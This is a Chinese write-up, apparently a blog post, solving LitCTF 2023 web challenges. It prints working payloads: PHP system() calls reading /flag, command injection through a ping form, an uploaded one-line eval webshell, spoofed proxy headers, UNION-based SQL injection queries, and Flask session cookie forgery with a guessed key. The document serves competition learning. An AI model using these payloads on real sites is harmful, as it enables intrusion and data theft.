LitCTF 2023-WEB部分wp

我Flag呢?

直接查看源代码

PHP是世界上最好的语言!! 

直接命令执行

<?php system('ls /'); ?>

<?php system('cat /flag'); ?>

导弹迷踪

查看js

1zjs

访问f@k3f1ag.php 

 密码的jsfuck

CTF在线工具-在线JSfuck加密|在线JSfuck解密|JSfuck|JSfuck原理|JSfuck算法 (hiencode.com)

Ping

随便传个 

 看一下源代码

发现只能输ip

我们尝试一下抓包 

command=127.0.0.1;ls /&ping=Ping

command=127.0.0.1;cat /flag&ping=Ping

Follow me and hack me

?CTF=Lit2023

 

Challenge=i'm_c0m1ng

 

作业管理系统

看一下源代码

账号admin

密码admin 

 

上传一句话木马

<?php
@eval($_POST['1']);
?>

蚁剑连接,找到/flag

 

Http pro max plus

 抓包

X-Forwarded-For: 127.0.0.1

不行就换一个

Client-Ip: 127.0.0.1

Referer:pornhub.com

User-Agent:Chrome

 

 

 百度了一下

via
通过请求中的"Via"字段,可以获取有关请求的中间代理服务器的信息。

"Via"字段是一个可选的HTTP请求头字段,其中包含了代理服务器的相关信息。当请求经过一个或多个代理服务器时,每个代理服务器都会向"Via"字段添加自己的标识。这样做的目的是提供有关请求路径的信息,以便于调试、故障排查和确定请求的来源。

"Via"字段通常采用以下的格式:

Via: [protocol-name]/[protocol-version] [proxy-node-name] ([proxy-node-IP]:[proxy-en-port]) 其中:

[protocol-name] 表示使用的协议,比如 "HTTP" 或 "HTTPS"。

[protocol-version] 表示协议的版本号,比如 "1.1"。

[proxy-node-name] 表示代理服务器的名称,可以是一个标识符或主机名。

[proxy-node-IP] 表示代理服务器的IP地址。

[proxy-node-port] 表示代理服务器的端口号。

其实我们在伪造的时候只需要直接添加代理服务器的名称就行了

 访问/wtfwtfwtfwtf.php

看一下源代码

 访问

/sejishikong.php

Vim yyds

inux下vi/vim异常关闭是会存留.swp文件

方法:提示vim异常关闭,访问url/.index.php.swp,得到flag。

打开文件,关键点

<?php
            error_reporting(0);
            $password = "Give_Me_Your_Flag";
            echo "<p>can can need Vim </p>";
            if ($_POST['password'] === base64_encode($password)) {
                echo "<p>Oh You got my password!</p>";
                eval(system($_POST['cmd']));
            }
            ?>
Give_Me_Your_Flag
base64编码:R2l2ZV9NZV9Zb3VyX0ZsYWc=

payload:

password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=ls /

password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag

 

这是什么?SQL !注一下 ! 

这题看大佬的wp

查看所有库(记得在url传)

?id=-1)))))) union select schema_name,2 from information_schema.schemata%23

 这里查ctftraing库

-1)))))) union select group_concat(table_name),2 from information_schema.tables where table_schema='ctftraining'%23

查看flag(经过测试,发现了table_schema只是内置库的字段,我们这里指定数据库查询应该用:库名.表名的形式)

-1)))))) union select flag,2 from ctftraining.flag%23

Flag点击就送!

看其他师傅的wp说是session伪造 

flask框架的session是存储在客户端的,那么就需要解决session是否会被恶意纂改的问题,而flask通过一个secret_key,也就是密钥对数据进行签名来防止session被纂改。

猜测Key为LitCTF测试一下

python flask_session_cookie_manager3.py encode -s 'LitCTF' -t '{"name":"admin"}'
eyJuYW1lIjoiYWRtaW4ifQ.ZGDo5g.cfMl5HdMqtOYD5nqQaUTmj-xNdc
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值